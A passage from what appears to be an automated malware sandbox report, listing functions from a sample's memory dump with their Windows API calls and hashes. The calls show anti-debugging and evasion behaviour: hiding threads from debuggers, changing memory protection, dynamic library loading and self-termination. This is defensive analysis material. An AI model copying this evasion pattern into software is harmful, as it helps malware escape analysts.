                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID:
                                  • API String ID: 543350213-0
                                  • Opcode ID: deeecf537dd3e043c6d4b20e4ee849d6ff0a43d4f419974e550acb286a86a5a7
                                  • Instruction ID: 9e471b999d893763ff992a71e576149da8c399d4d00737f0e463929f5ce3bba1
                                  • Opcode Fuzzy Hash: deeecf537dd3e043c6d4b20e4ee849d6ff0a43d4f419974e550acb286a86a5a7
                                  • Instruction Fuzzy Hash: 1751DC34A34343AAEF3429E888547F912535F827A4FA4412AECCAA75DDDBB5C582C907
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0E33, Relevance: 1.7, APIs: 1, Instructions: 200nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID:
                                  • API String ID: 543350213-0
                                  • Opcode ID: 54be6fe74beec865fd41ae60c3fe385012569399a5c4631f1668865adafffb36
                                  • Instruction ID: 5122e283bc98cd89f70b0a084784b9d4d6db728b164c00adea0f3de8d4309deb
                                  • Opcode Fuzzy Hash: 54be6fe74beec865fd41ae60c3fe385012569399a5c4631f1668865adafffb36
                                  • Instruction Fuzzy Hash: 7651CE34934343A6EF3429E888547F912235F437A4FA4422ADCCEA75DDDBB5C182C917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0E7B, Relevance: 1.7, APIs: 1, Instructions: 192nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 85d3559cc58c2a5a72ee23389b340e3b0eb56a962e0ade93037dd6ca46de15e0
                                  • Instruction ID: cb063f54e8635c27bcbb19fe9d6492476f096b516c16a884ebfc4314bc85c862
                                  • Opcode Fuzzy Hash: 85d3559cc58c2a5a72ee23389b340e3b0eb56a962e0ade93037dd6ca46de15e0
                                  • Instruction Fuzzy Hash: 2651EE38934343A6EF3029D888547F912235F437A4FA4422ADCCEA79EDDBA5C183C917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0EC7, Relevance: 1.7, APIs: 1, Instructions: 178nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 5800b579a2bcc596023008177a94011a716413a45e67f57394ab2d4f2bbba7db
                                  • Instruction ID: 0cc491eb489cb38e586ca782aa70857daece412829191e72f10412cb9bdd7886
                                  • Opcode Fuzzy Hash: 5800b579a2bcc596023008177a94011a716413a45e67f57394ab2d4f2bbba7db
                                  • Instruction Fuzzy Hash: 91518C38438347A6EF3529D888547F912135F433A4FA4421ADCCEA79EDD7A5C187C917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0F0B, Relevance: 1.7, APIs: 1, Instructions: 172nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 54e31e57feebab89dc3091553d6ed81a8164b8e14f471f61043cf4021f1f2528
                                  • Instruction ID: b7940f39d4d22e3cf3d209a8957e1a9ddda4089e6dd5e853f8327708c5f80dfd
                                  • Opcode Fuzzy Hash: 54e31e57feebab89dc3091553d6ed81a8164b8e14f471f61043cf4021f1f2528
                                  • Instruction Fuzzy Hash: D341A938838347A6EF3429D889943F912135F433A4FA4421ADC8EA79EDCBA5C1C78907
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0F6B, Relevance: 1.7, APIs: 1, Instructions: 159nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 524600072ba20bf3f4de84c5c7fbf90338dc95135ddd4fbf2cc939a2ac0d4ec4
                                  • Instruction ID: 333a40706eb1f1fd154c3831475d72dbc296264d3f613eeed405ef0307ad489a
                                  • Opcode Fuzzy Hash: 524600072ba20bf3f4de84c5c7fbf90338dc95135ddd4fbf2cc939a2ac0d4ec4
                                  • Instruction Fuzzy Hash: 5B41893843834796EF3429D888987F922135F433B4FA4421ADC8EAA9EDD7A5C1878917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0FE7, Relevance: 1.6, APIs: 1, Instructions: 143nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,000000FF,00000007,?,00000004,00000000), ref: 022D41A7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadProcessTerminateThread
                                  • String ID:
                                  • API String ID: 1761224837-0
                                  • Opcode ID: e8510d663f8cf78de5aaa277c2dd018f0786da4cac1a997c6505c35245aad610
                                  • Instruction ID: b61bd620748eadc659fb225a1baf1f2354a7db33a35bf54c31fd9cc7676303aa
                                  • Opcode Fuzzy Hash: e8510d663f8cf78de5aaa277c2dd018f0786da4cac1a997c6505c35245aad610
                                  • Instruction Fuzzy Hash: 9A41BB78438347A6EF3129E888847F912531F433B4FA44256DC8EDA9EDC7A6C1878917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D1073, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b284a14fdd7b8f65eac10b6cc8af95647b9794465483b027c20503ce5b26047e
                                  • Instruction ID: 38111940bf569f049e06027415e413a750aad6ceb27c1afdab0d167a598face3
                                  • Opcode Fuzzy Hash: b284a14fdd7b8f65eac10b6cc8af95647b9794465483b027c20503ce5b26047e
                                  • Instruction Fuzzy Hash: F531CD34538347A6EF3029E888547FA22631F43370FA04256DC9A9B9DDD7F58196C917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D10C7, Relevance: 1.6, APIs: 1, Instructions: 105nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,000000FF,00000007,?,00000004,00000000), ref: 022D41A7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadProcessTerminateThread
                                  • String ID:
                                  • API String ID: 1761224837-0
                                  • Opcode ID: 181ee560a4cfe15c3721849d64253e56e7f8b17847478d829cab24351516115f
                                  • Instruction ID: 245ab0d52aa7b2e92e100eca59724b27465e8483e0fabd362e79ebcf588dc08e
                                  • Opcode Fuzzy Hash: 181ee560a4cfe15c3721849d64253e56e7f8b17847478d829cab24351516115f
                                  • Instruction Fuzzy Hash: 9C31AB34538347A6EF3129E898447F922631F43370FA04256DC99AA9DEC3F68192CE17
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D110F, Relevance: 1.6, APIs: 1, Instructions: 98nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,000000FF,00000007,?,00000004,00000000), ref: 022D41A7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadProcessTerminateThread
                                  • String ID:
                                  • API String ID: 1761224837-0
                                  • Opcode ID: 8700db6675c07e494c520f9ac4d520e4a40f4202ba654a74d17b8fa7e7c2c616
                                  • Instruction ID: 4418895ff9021a0e85d8279fced6416fe4d7fed4ecce96a9693b575998591aba
                                  • Opcode Fuzzy Hash: 8700db6675c07e494c520f9ac4d520e4a40f4202ba654a74d17b8fa7e7c2c616
                                  • Instruction Fuzzy Hash: B9219938538747A6EF3129EC89047F922531F433B0F944256DC999A9DE93E68182CD1B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D1220, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,000000FF,00000007,?,00000004,00000000), ref: 022D41A7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 5bd499c2d8711e50d76fffce03cc376b90ad28d86e9689fe990df9f044056383
                                  • Instruction ID: a7521fc0f55c9657d86281457a59028658a665f96366457db03395e1f879d1e0
                                  • Opcode Fuzzy Hash: 5bd499c2d8711e50d76fffce03cc376b90ad28d86e9689fe990df9f044056383
                                  • Instruction Fuzzy Hash: 0C11C2704787C796EF326AE848047F927132F53394F94429AC8494B5CDD3E64196CF57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D11FF, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,000000FF,00000007,?,00000004,00000000), ref: 022D41A7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 06285dc7249a85a0a4cb8e459aa9f8ab2d2e9a1ef5389ed21157a647e61c43a4
                                  • Instruction ID: e67213a2d20e6052a02c11f9059479c8173bf5541c2b5fea98c35a570fb1e4de
                                  • Opcode Fuzzy Hash: 06285dc7249a85a0a4cb8e459aa9f8ab2d2e9a1ef5389ed21157a647e61c43a4
                                  • Instruction Fuzzy Hash: 8911483443878792DF316AE899047F827522F037A8F54429ADC8E5B9DDC3F68196CE1B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D4717, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,022D46BF,022D477E,022D0974), ref: 022D4770
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 8ce3d6f90880738a9f0bcbc703707f92ee69156c88b9031c0ce8e35e889ba8e6
                                  • Instruction ID: 9c1d6ef1a3636fa4fed6fadc8771953def3075b4e89d9b8ce774704845327f85
                                  • Opcode Fuzzy Hash: 8ce3d6f90880738a9f0bcbc703707f92ee69156c88b9031c0ce8e35e889ba8e6
                                  • Instruction Fuzzy Hash: 3DF027347603066BF72448545EF1FEA52439BA37A0F20813AAD46271C9C3F15C48C000
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D6F67, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: e37c29c7d6b90b9e596ff033c7b05c5c5614de6b7a3e6c9e4377c0e996593c03
                                  • Instruction ID: 23335d3e9394a8a1b39d1bd02b49f2b0c53e70e07454e7cd8980bf93242a426c
                                  • Opcode Fuzzy Hash: e37c29c7d6b90b9e596ff033c7b05c5c5614de6b7a3e6c9e4377c0e996593c03
                                  • Instruction Fuzzy Hash: 40F05E346B82169AEF3426F46881BFCD2235B45221FD48627A863810DD96DCC08E8917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D12C3, Relevance: 1.5, APIs: 1, Instructions: 34nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,000000FF,00000007,?,00000004,00000000), ref: 022D41A7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationProcessTerminateThread
                                  • String ID:
                                  • API String ID: 1477408370-0
                                  • Opcode ID: 31b73052017b9311855416e9a08d474408ad5e8c5d9ba93a3e88c6c0ea1fd231
                                  • Instruction ID: 26ed2568e499f8894ffc11e93c2363b0e7953f7c667ef4dfa5cdf175774e621b
                                  • Opcode Fuzzy Hash: 31b73052017b9311855416e9a08d474408ad5e8c5d9ba93a3e88c6c0ea1fd231
                                  • Instruction Fuzzy Hash: 1BF09E31028AC291EF126DAC94007F81B422B43324FA483DAC859271CDD3E81297C72B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D7014, Relevance: 1.5, APIs: 1, Instructions: 26libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 3870f991cfe3e62dff8fc519a606d65977607df41da2df9b4a45888928f02144
                                  • Instruction ID: a4fddb07b88320a94eed68b5a357cbd62acd67e45d204640b1e41ed571958f8f
                                  • Opcode Fuzzy Hash: 3870f991cfe3e62dff8fc519a606d65977607df41da2df9b4a45888928f02144
                                  • Instruction Fuzzy Hash: 70E0203057C251CB6F2615F418011E8E6225E113527D8436BD423450FCD1EDC04BCF23
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D704B, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 6c4769e9c642d87f89255136f7eb0e2766592d551440c0f9a9075ec007988d43
                                  • Instruction ID: 71b06290bb47e96523f3187d2c01c2d0f78d519def559f4460f006f2bce8229e
                                  • Opcode Fuzzy Hash: 6c4769e9c642d87f89255136f7eb0e2766592d551440c0f9a9075ec007988d43
                                  • Instruction Fuzzy Hash: 01D05B7467C215D76F2019F858446ECE6125E50611BD48317E823461ECD1ECC187CE57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D4B16, Relevance: 1.5, APIs: 1, Instructions: 17libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.NTDLL(022D1844,00000000,00000000,00000000,00000000,0000003F,00000307,?,022D482A,?,?,00000004,?,000000FF,00000007), ref: 022D5653
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2ca0be6b7eacd7e30322364200a1907974917d3d4b003a65fe388cc177753a10
                                  • Instruction ID: fd27e1577f0f48eb9f96f73cf5829fd52408b475f147d2bbf6b4d77490b729d1
                                  • Opcode Fuzzy Hash: 2ca0be6b7eacd7e30322364200a1907974917d3d4b003a65fe388cc177753a10
                                  • Instruction Fuzzy Hash: 04D0A7396293834DF2017AA004657427FA557A068179CC08990800716B8AA06666E7D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D707F, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 08710a67d09a26126edabeff7311275fdc24c3bfedd17097a1429bb6b4d89aa1
                                  • Instruction ID: e94f6f1ce592ee99ec10f7646b22a379297731444d657caa61e5917dc137b0ec
                                  • Opcode Fuzzy Hash: 08710a67d09a26126edabeff7311275fdc24c3bfedd17097a1429bb6b4d89aa1
                                  • Instruction Fuzzy Hash: 47D02331E7D3149FFF151AA014810ECE7231D51311755C167E4134B0ADD1FCC44AC715
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D70E7, Relevance: 1.5, APIs: 1, Instructions: 11libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 0c858048cc1c826667e7793c18a248b6f135126bd6f899e663685dd49adb0c87
                                  • Instruction ID: 7f107d23eef83dff4d1d14845a7f105d3bf341389439b32df856e90159a675c4
                                  • Opcode Fuzzy Hash: 0c858048cc1c826667e7793c18a248b6f135126bd6f899e663685dd49adb0c87
                                  • Instruction Fuzzy Hash: DCC02B30B7D31387AF1425D438C009C83121B402007104235E4038A02CC298C84A4200
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D416E, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,000000FF,00000007,?,00000004,00000000), ref: 022D41A7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 86ef0c7964f256c332dd9d6a1a556d3f73fe8d739c360c01cc626ee0ed713048
                                  • Instruction ID: 43cbf0fcd1a38d04fbbd5197ba77c92ce619c10932a2b2d8186de68e9874d3a9
                                  • Opcode Fuzzy Hash: 86ef0c7964f256c332dd9d6a1a556d3f73fe8d739c360c01cc626ee0ed713048
                                  • Instruction Fuzzy Hash: D6B0922015824A95EE506A50A90ABE423101B832ECE1403512DBA740E6C6A0818B8211
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D710F, Relevance: 1.5, APIs: 1, Instructions: 9libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: a86c045ad13f2d4a3b785944d747d7730d39e228a357565d174d66461f3eb0dc
                                  • Instruction ID: 1f845d403f8fa7882ac5b58bd64a61d12ce4e4a8a3d7935546080c1ea3503efa
                                  • Opcode Fuzzy Hash: a86c045ad13f2d4a3b785944d747d7730d39e228a357565d174d66461f3eb0dc
                                  • Instruction Fuzzy Hash: CDB01234BBD2345BEF113AA47CC40CC93624B40219B105235F013CB02EC6A9C88F8744
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 022D86DF, Relevance: .2, Instructions: 183nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                    • Part of subcall function 022D8E42: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022D8852,00000040,022D090E,00000000,00000000,00000000,00000000,?,00000000,00000000,3E17ADE6), ref: 022D8E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                  • String ID:
                                  • API String ID: 449006233-0
                                  • Opcode ID: 4360972c0ea89771969bb9cec1ece5264d0d0248f476806af8d150458ed69736
                                  • Instruction ID: 053f6b064a9b0c1e6d15ceb1136b864bc06b0dbfe8d53a29842157dae867b1e6
                                  • Opcode Fuzzy Hash: 4360972c0ea89771969bb9cec1ece5264d0d0248f476806af8d150458ed69736
                                  • Instruction Fuzzy Hash: C851E970968383CEDB25DFA884947A5B791AF16360F49829AD8968B3DAC375C483C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D874B, Relevance: .2, Instructions: 175nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                    • Part of subcall function 022D8E42: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022D8852,00000040,022D090E,00000000,00000000,00000000,00000000,?,00000000,00000000,3E17ADE6), ref: 022D8E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                  • String ID:
                                  • API String ID: 449006233-0
                                  • Opcode ID: c4cbf4ef852e9842f9b4e1f6de680ca8b06ad5f9155c51be96aa1812939cfd6b
                                  • Instruction ID: 1c9e90bbc551f358771bd0bab432877008b4d3f4d0b2afd380b7dfd2ff193cc5
                                  • Opcode Fuzzy Hash: c4cbf4ef852e9842f9b4e1f6de680ca8b06ad5f9155c51be96aa1812939cfd6b
                                  • Instruction Fuzzy Hash: 5251DA70968383CEDB25DFA888947A5B7D19F06360F598299D8968F3DAC3758443C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D878B, Relevance: .2, Instructions: 170nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D8E42: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022D8852,00000040,022D090E,00000000,00000000,00000000,00000000,?,00000000,00000000,3E17ADE6), ref: 022D8E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID:
                                  • API String ID: 675431017-0
                                  • Opcode ID: 393288d51e206e2277e49307f7bba1e93eecdf69db707083ed3afff387a9bbce
                                  • Instruction ID: bcdff6a72a1f492226456223e05b9bdef3f25f0105f6ecc6e877e963321135f0
                                  • Opcode Fuzzy Hash: 393288d51e206e2277e49307f7bba1e93eecdf69db707083ed3afff387a9bbce
                                  • Instruction Fuzzy Hash: A151EA70968383CEDB259FA8C894BA5B7D19F16360F498299D8D68F3DAC3758483C713
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D2B4E, Relevance: .1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43021bb222049379a9e5c418e9786734a3b92c77920753aaf9c6672183764614
                                  • Instruction ID: c2c07c0a6586db0284adfae421e3d9ba48de9ac66fdd84654de7bbd2ba6a35fe
                                  • Opcode Fuzzy Hash: 43021bb222049379a9e5c418e9786734a3b92c77920753aaf9c6672183764614
                                  • Instruction Fuzzy Hash: 92416671660317DBDB54AA78CC60BE233A6FF55350F844335EC9AD328EDB21E885CA90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D2EF7, Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 280ef6dea4187a1db21ae8e047c0aed51a0ec6cbde9e345d047f0f15397cc894
                                  • Instruction ID: d44a92bd5911d723365088952a240355b33db99313abca4a748abb0bb0eb30e7
                                  • Opcode Fuzzy Hash: 280ef6dea4187a1db21ae8e047c0aed51a0ec6cbde9e345d047f0f15397cc894
                                  • Instruction Fuzzy Hash: A8210A34234305EFEF247B94DC79BF522A1BF00754F924559DD429F1D9C7B18881CA12
                                  Uniqueness

